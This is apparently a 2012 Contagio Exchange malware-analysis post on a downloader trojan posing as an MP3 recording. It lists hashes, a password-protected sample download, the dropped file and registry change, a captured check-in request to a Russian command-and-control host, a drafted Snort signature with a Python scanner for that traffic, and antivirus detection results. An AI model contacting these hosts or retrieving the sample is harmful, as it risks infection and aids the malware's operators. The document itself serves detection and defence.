About contagio exchange

Contagio Exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy and Mila too, so this was not a very active site (my fault probably), so I will just be dumping malware strings here - it often helps in malware identification, and googling is the best way.
With just strings it is not exactly a fun blog to read, but it might become a useful resource over time.
I will not be posting samples here, just MD5. You can find the corresponding samples on Contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Thursday, June 7, 2012

023 Crime Downloader Trojan (name?) - web - June 7, 2012

Audio_Recording_MP3
MD5: FDC170166CB958E138E7D401F3C6F896
SHA1: A3253B1732A50146038A68B3B46260F80BEC6C1C

Download (pass infected)

pcap file

Audio_Recording_MP3.exe
Creates: c:\Documents and Settings\Administrator\Local Settings\Application Data\blbljsqp.exe  (file name random)
Value changes: HKCU\software\microsoft\windows\currentversion\explorer\shell folders[local appdata]

GET /gley/index.php?r=gate&id=e81b9088&group=30.05.2012&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: krasguatanany.ru

HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Thu, 07 Jun 2012 16:09:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Connection: keep-alive
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /gley/index.php was not found on this server.</p>
<hr>
<address>Apache/2.2.16 (Debian) Server at krasguatanany.ru Port 80</address>
</body></html>

ET signature discussion

Nathan Fowler | 8 May 17:45
Re: Create Signatures

On 05/08/12 09:40, Phil Robinson wrote:
> hxxp://bing[.]com/afyu/index.php?r=gate&id=[N]&group=[D]&debug=0
> hxxp://twitter[.]com/nygul/index.php?r=gate&ac=[N]&group=[D]&debug=0
> hxxp://fb[.]com/dwrgh/index.php?r=gate&fg=[N]&group=[D]&debug=0
> hxxp://google[.]com/efwgh/index.php?r=gate&cc=[N]&group=[D]&debug=0
> hxxp://everkosmo2012[.]ru/ab/index.php?r=gate&id=[N]&group=[D]&debug=0
>
> I was unable to find any existing signatures. Can someone help? Thanks.....

Looks like here's an example,

http:// everkosmo2012.ru/ab/index.php?r=gate&id=00cd1a40&group=20.04.2012&debug=0

Not sure what this is called though,

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN -
Check-in Not sure what this is called"; flow:established,to_server;
content:".php?r=gate"; http_uri; fast_pattern; content:"&group=";
http_uri; distance:0; content:"&debug="; http_uri; distance:0;
classtype:trojan-activity; sid:x; rev:1;)
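As an added example (my own code, not from the thread or the ET rule's author), the three ordered http_uri matches of the draft rule above translated into a Python check that can be run over request lines pulled from a proxy log or from the pcap; the bare request-line input format and the parameter-name heuristic for the bot id are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Ordered http_uri tokens from the draft ET rule; each must occur after the
# end of the previous match, mirroring Snort's "distance:0" semantics.
CHECKIN_TOKENS = (".php?r=gate", "&group=", "&debug=")

def matches_gate_checkin(uri):
    """True if all three tokens appear in the URI in rule order."""
    pos = 0
    for token in CHECKIN_TOKENS:
        idx = uri.find(token, pos)
        if idx < 0:
            return False
        pos = idx + len(token)
    return True

def extract_checkin_fields(uri):
    """Pull bot id, group (looks like a build date) and debug flag.
    Assumption: the id parameter name varies (id/ac/fg/cc in the thread),
    so the one parameter that is not r/group/debug is taken as the id."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    others = [k for k in params if k not in ("r", "group", "debug")]
    id_param = others[0] if others else None
    return {
        "id_param": id_param,
        "id": params[id_param][0] if id_param else None,
        "group": params.get("group", [None])[0],
        "debug": params.get("debug", [None])[0],
    }

# Assumed input format: bare HTTP request lines, one per list entry.
REQUEST_LINE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]$")

def scan_request_lines(lines):
    """Return [(uri, fields)] for every request line the rule would flag."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.match(line.strip())
        if m and matches_gate_checkin(m.group(2)):
            hits.append((m.group(2), extract_checkin_fields(m.group(2))))
    return hits

# Constructed sample: the request seen in the pcap above, the URL from the
# thread, one with the tokens out of order, and ordinary PHP traffic.
SAMPLE_LINES = [
    "GET /gley/index.php?r=gate&id=e81b9088&group=30.05.2012&debug=0 HTTP/1.1",
    "GET /ab/index.php?r=gate&id=00cd1a40&group=20.04.2012&debug=0 HTTP/1.1",
    "GET /x/index.php?r=gate&debug=0&group=01.01.2012 HTTP/1.1",
    "GET /blog/index.php?r=site/login HTTP/1.1",
]
```

Like the rule, the check keys only on the URI, so a variant that reorders or renames the group/debug parameters would slip past it.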

https://www.virustotal.com/file/1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4/analysis/

SHA256: 1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4
SHA1: a3253b1732a50146038a68b3b46260f80bec6c1c
MD5: fdc170166cb958e138e7d401f3c6f896
File size: 53.0 KB ( 54272 bytes )
File name: 1338806789.Audio_Recording_MP3-itYk.exe
File type: Win32 EXE
Detection ratio: 24 / 41
Analysis date: 2012-06-04 10:46:37 UTC ( 3 days, 5 hours ago )

Antivirus             Result                              Update
AhnLab-V3             Win-Trojan/Kuluoz.54272             20120604
AntiVir               TR/Crypt.XPACK.Gen                  20120604
Antiy-AVL             -                                   20120604
Avast                 Win32:Dropper-gen [Drp]             20120604
AVG                   Downloader.Generic12.CFBJ           20120604
BitDefender           Trojan.Generic.KDV.637381           20120604
ByteHero              -                                   20120531
CAT-QuickHeal         -                                   20120604
ClamAV                -                                   20120602
Commtouch             -                                   20120604
Comodo                -                                   20120604
DrWeb                 Trojan.MulDrop3.51893               20120604
Emsisoft              Trojan-Downloader.Win32.Dapato!IK   20120604
eSafe                 -                                   20120603
F-Prot                -                                   20120603
F-Secure              Trojan.Generic.KDV.637381           20120604
Fortinet              W32/Dapato.LON!tr.dldr              20120603
Ikarus                Trojan-Downloader.Win32.Dapato      20120604
Jiangmin              -                                   20120604
K7AntiVirus           -                                   20120601
Kaspersky             Trojan-Downloader.Win32.Dapato.lon  20120604
McAfee                Generic Downloader.z                20120604
McAfee-GW-Edition     Generic Downloader.z                20120604
Microsoft             TrojanDownloader:Win32/Kuluoz.B     20120602
NOD32                 Win32/TrojanDownloader.Zortob.B     20120604
Norman                W32/Troj_Generic.BZPCE              20120603
nProtect              Trojan.Generic.KDV.637381           20120604
Panda                 Trj/CI.A                            20120603
PCTools               Trojan.Gen                          20120604
Rising                -                                   20120604
Sophos                Troj/Agent-WGO                      20120604
SUPERAntiSpyware      -                                   20120602
Symantec              Trojan.Gen                          20120604
TheHacker             -                                   20120531
TotalDefense          -                                   20120604
TrendMicro            TROJ_KRYPTIK.XCV                    20120604
TrendMicro-HouseCall  TROJ_KRYPTIK.XCV                    20120604
VBA32                 -                                   20120604
VIPRE                 Trojan.Win32.Generic!BT             20120604
ViRobot               -                                   20120604
VirusBuster